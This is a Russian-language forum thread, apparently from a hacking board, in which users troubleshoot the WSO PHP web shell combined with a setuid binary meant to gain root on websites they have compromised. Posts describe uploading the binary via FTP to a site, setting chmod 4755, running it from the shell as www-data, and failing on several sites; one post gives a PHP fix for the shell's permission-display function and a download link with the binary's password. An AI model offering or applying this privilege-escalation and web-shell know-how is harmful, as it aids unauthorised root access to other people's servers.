Установленный suid-бит позволяет выполнять файл от имени владельца файла, а не текущего юзера. Т.е. если дать суиднику права root'a, то можно будет выполнять команды от имени root'a с любого юзера. Ну и следовательно модификация, чтобы более удобно использовать суидник (сохраняя графическую оболочку web-shell'a), а не просто выполнение команд. На вин все неправильно работает
Спасибо, сейчас скомпилил, залив на ftp одного сайта(владелец user), сделал chmod 4755, зашел через вебшелл(права apache) - попробовал выполнить суидник - права показываются как апачевские. Естественно, предварительно я посмотрел в /etc/passwd какие uid и gid у юзверя моего ftp, которые я вписал вместо рутовских нулей. Почему так? Что именно?
На вин права не правильно отображаються, а именно функция: PHP: function wsoPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>'; elseif (!@is_writable($f)) return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>'; else return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>'; } Багфикс при котором работает правильно PHP: function wsoPermsColor($f) { if(is_dir($f)) { if($GLOBALS['os'] == 'nix'){ if(is_writeable($f)) { return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>'; }elseif(is_readable($f)){ return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>'; } else return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>'; } else { $tmp = $f.'/.ssps_tmp'; if(@touch($tmp)){ unlink($tmp); return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>'; }elseif(opendir($f)){ closedir(); return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>'; } else return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>'; } } else { if($fp = @fopen($f, 'a')) return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>'; elseif($fp = @fopen($f, 'r')) return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>'; return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';; } }
http://www.keep2.me/files/e4b18a2e046706d5e6e8c14f238b05e4/23.11.15-30.08-1278x260.jpg вот тут у меня юзер antidonat а с помощью этого можно сделать другой типа и посмотреть закрытые разделы? если не с помощью этого. то как?
Подскажите пожалуйста. Я использую шел (из первого поста ) + этот суидник ( пост 20 ( Скомпилированный суидник с паролем 112s233: http://rghost.ru/19777451 ) )... Но у меня не получается зайти по рутом, я почему - то захожу под 33 ( www-data ) Group: 33 ( www-data ). Подскажите, в чём проблема? P.S. Ввожу так: Suid: ./suid Password: 112s233 Php: /usr/bin/php
Установлено: 4751 И ничего не выходит большинство команд не срабатывает, директорий не открывается ;(
В первом посте выложена версия в которой невозможно указать путь к PHP. Если это важно выложите версию где это можно зделать. Php: /usr/bin/php а без этого у меня ошибка вылезает: Query did not return anything Are you sure you want to save changes? делаю вот так: Suid: ./suid Password: 112s233 что неправильно? или насколько я понимаю что не везде можно получить root шелл?
не могу пробить объясните пож. все сделал нормально нажал чудо кнопку и: это значить не пробить.(уже штук на 6 сайтах пробовал то же самое )
Кого не пробить ? Что у тебя за "./" в первой строке ? это тебе что консоль ? в первой строке указуется полный серверный путь к суидному файлу... Пример: /tmp/suid P.S. в 20-м посте этой темы, Tigger показал как использовать суидный файл в консоли шела.
При попытке редактировать файл, часто пишет. Соединение было сброшено.... или выкидывает на каталог с файлами а файл не сохраняет.
